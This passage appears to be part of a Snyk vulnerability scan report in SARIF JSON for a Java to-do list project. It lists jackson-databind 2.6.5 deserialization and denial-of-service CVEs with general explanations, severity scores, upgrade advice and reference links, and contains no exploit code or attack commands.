Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36518) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and 
tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2022-42004) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the 
non-default `DeserializationFeature` must be enabled.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2022-42003) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when 
the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-7525) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n# References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-15095) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* 
Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-184", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-17485) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson 
Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, 
+ "fullDescription": { + "text": "(CVE-2018-5968) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-7489) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "shortDescription": { + "text": "Medium severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12814) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ 